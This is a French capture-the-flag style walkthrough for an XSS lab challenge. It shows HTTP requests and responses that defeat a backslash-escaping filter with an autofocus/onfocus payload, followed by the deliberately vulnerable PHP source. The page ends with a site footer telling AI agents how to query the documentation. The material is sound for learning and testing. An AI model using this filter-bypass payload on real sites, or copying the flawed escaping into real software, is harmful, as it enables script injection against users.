# xxs6

## Exploitation

Afin de protéger l'application, l'auteur indique qu'il échappe maintenant le caractère `"` : 

![](/files/z0ydvPgLyJrqQG8kmrTx)

Le caractère `"` subit effectivement un traitement, il s'agit d'un échappement par l'insertion du caractère `\` : 

```http
POST /xss6/ HTTP/1.1
Host: localhost:9003
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 33
Origin: http://localhost:9003
Connection: close
Referer: http://localhost:9003/xss6/

search=whatever%22&submit=Envoyer
```

```html
HTTP/1.1 200 OK
Server: Apache/2.4.53 (Debian)
X-Powered-By: PHP/8.0.18
Content-Length: 2100
Connection: close
Content-Type: text/html; charset=UTF-8

<div class="form-group col-md-2">
  <input type="text" class="form-control" id="search" name="search" value="whatever\"" placeholder="keyword" required>
</div>
```

![](/files/TIzb8kujzfPprI11k9mS)

Le contournement qui me parait le plus évident à tester est d'insérer également un caractère `\` afin d'échapper l'échappement :&#x20;

```http
POST /xss6/ HTTP/1.1
Host: localhost:9003
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
Origin: http://localhost:9003
Connection: close
Referer: http://localhost:9003/xss6/

search=whatever%5C%22&submit=Envoyer
```

```html
HTTP/1.1 200 OK
Server: Apache/2.4.53 (Debian)
X-Powered-By: PHP/8.0.18
Content-Length: 2101
Connection: close
Content-Type: text/html; charset=UTF-8

<div class="form-group col-md-2">
  <input type="text" class="form-control" id="search" name="search" value="whatever\\"" placeholder="keyword" required>
</div>
```

Cela semble fonctionner :&#x20;

![](/files/2ftHeeCPEDSoEYIO0MBx)

Il ne me reste plus qu'à adapter ma payload basée sur l'autofocus `whatever\" onfocus=alert(1) autofocus x=\"` (attention, j'enlève également les guillemets autour du code Javascript) :&#x20;

```http
POST /xss6/ HTTP/1.1
Host: localhost:9003
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 80
Origin: http://localhost:9003
Connection: close
Referer: http://localhost:9003/xss6/

search=whatever%5C%22+onfocus%3Dalert%281%29+autofocus+x%3D%5C%22&submit=Envoyer
```

```html
HTTP/1.1 200 OK
Server: Apache/2.4.53 (Debian)
X-Powered-By: PHP/8.0.18
Content-Length: 2134
Connection: close
Content-Type: text/html; charset=UTF-8

<div class="form-group col-md-2">
  <input type="text" class="form-control" id="search" name="search" value="whatever\\" onfocus=alert(1) autofocus x=\\"" placeholder="keyword" required>
 </div>       
```

![](/files/FkNTs4FAdKaZtRHSH20G)

## Analyse du code source

La fonction `xss_check()` effectue un traitement sur le caractère `"` qui se retrouve échappé par l'ajout d'un `\` devant chaque occurrence. Le mot clé est ensuite affiché en tant que valeur de l'attribut HTML `value` :&#x20;

```php
<?php
  if (isset ($_POST['submit']) && isset ($_POST['search'])) {
    $keyword = $_POST['search'];
  }

  function xss_check($data) {
    $input = str_replace('"', '\"', $data);
    $input = urldecode($input);
    return $input;
  }
?>

<div class="row">
  <form name="forgetPass" method="post">
    <div class="form-group col-md-2">
      <input type="text" class="form-control" id="search" name="search" value="<?php if (isset ($keyword) && !empty ($keyword)){ echo xss_check($keyword); }?>" placeholder="keyword" required>
    </div>
    <div class="form-group col-md-2">
      <input type="submit" class="form-control btn btn-default" name="submit">
    </div>
  </form>
</div>
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://sharpforce.gitbook.io/cybersecurity/walkthroughs/deliberately-vulnerable/xss-vulnerability-challenges/xxs6.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.